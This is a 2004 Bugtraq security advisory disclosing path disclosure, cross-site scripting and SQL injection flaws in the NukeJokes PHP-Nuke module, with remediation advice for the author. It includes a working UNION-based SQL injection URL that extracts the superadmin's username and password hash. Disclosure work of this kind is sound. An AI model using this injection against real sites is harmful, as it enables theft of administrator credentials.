
List:       bugtraq
Subject:    [waraxe-2004-SA#028 - Multiple vulnerabilities in NukeJokes
From:       Janek Vind <come2waraxe () yahoo ! com>
Date:       2004-05-08 19:22:17
Message-ID: 20040508192217.6679.qmail () www ! securityfocus ! com
{================================================================================}
{                              [waraxe-2004-SA#028]                              }
{================================================================================}
{                                                                                }
{         [ Multiple vulnerabilities in NukeJokes module for PhpNuke ]           }
{                                                                                }
{================================================================================}
Author: Janek Vind "waraxe"
Date: 08. May 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=28


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From readme file:

"Nuke jokes is an addon for PHPNuke. It has been tested with PHPNuke 6.0. It should
work with 6.5 and some lower versions but I haven't been able to test it. Nuke Jokes
allows you to have a database of jokes on your website. Jokes are separated into
different categories to make them easier to find. It includes the ability to rate
jokes, shows how many views they've had and other information. Also includes a search
engine. The admin area allows you to add, edit and delete jokes and categories,
install and uninstall the database and validate user added jokes."

Author: Adam Webb

Websites:

	http://www.funportal.host.sk
	http://funportal.beanwebb.com

I have tested two different versions of NukeJokes: v1.7 and 2 Beta. They seem to
have the same security bugs.

Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well, what to say? I was really surprised when I saw the NukeJokes source code - almost
ALL SQL queries are WITHOUT ANY single quotes...
A wide area to practice SQL injection attacks. And most user-submitted parameters are
not sanitized at all, so full path disclosure and XSS cases exist there too. In
fact, NukeJokes has so many bugs that I'm too lazy to count them all. So I will just
bring some examples...


A. Full path disclosure:

Examples:

http://localhost/nuke72/modules/NukeJokes/mainfunctions.php

http://localhost/nuke72/modules.php?name=NukeJokes&func=JokeView&jokeid=foobar

http://localhost/nuke72/modules.php?name=NukeJokes&func=CatView&cat=foobar



B. Cross-site scripting aka XSS:

Examples:

http://localhost/nuke72/modules.php?name=NukeJokes&func=CatView&cat=[xss code here]

http://localhost/nuke72/modules.php?name=NukeJokes&func=JokeView&jokeid=[xss code here]



C. SQL injection:

Example exploiting GET request:

http://localhost/nuke72/modules.php?name=NukeJokes&file=print&jokeid=-1/**/UNION/**/SELECT/**/aid,pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*

and we can see the superadmin's username and the md5 hash of the password with ease. Of course,
MySQL has to be 4.x with UNION functionality enabled for successful exploitation.



Ending words to the author(s) - NukeJokes is based on good ideas, but must be rewritten
in a secure way! This is not such big work - just add those single quotes to all SQL
queries and sanitize the variables passed to the script by the client browser, to avoid
cross-site scripting and path disclosure bugs. If you want some advice from me, you
can always send an email and I will help.



Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to Raido Kerna and to all bugtraq readers in Estonia! Tervitused!
Special greets to http://www.gamecheaters.us staff!



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@yahoo.com
    Janek Vind "waraxe"

    Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------